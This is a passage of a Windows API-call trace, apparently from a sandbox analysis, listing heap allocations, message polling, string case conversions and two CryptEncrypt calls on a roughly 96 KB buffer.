Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0213.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0213.900] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0213.901] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0213.901] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.902] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854398 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0213.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0213.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0213.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0213.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0213.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0213.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0213.903] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0213.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0213.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.903] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0213.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0213.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0213.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0213.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0213.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab728, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0213.908] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17996, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x17998) returned 1 [0213.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.908] CharLowerBuffW (in: lpsz="byte[96664]", cchLength=0xb | out: lpsz="byte[96664]") returned 0xb [0213.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.913] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.913] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0213.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab6e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0213.915] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x17996, dwBufLen=0x17998 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x17998) returned 1 [0213.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.920] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0213.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.920] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0213.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.920] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0213.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.920] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0213.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.920] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.921] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.921] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.921] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.921] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.921] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.921] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.929] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.929] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.929] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 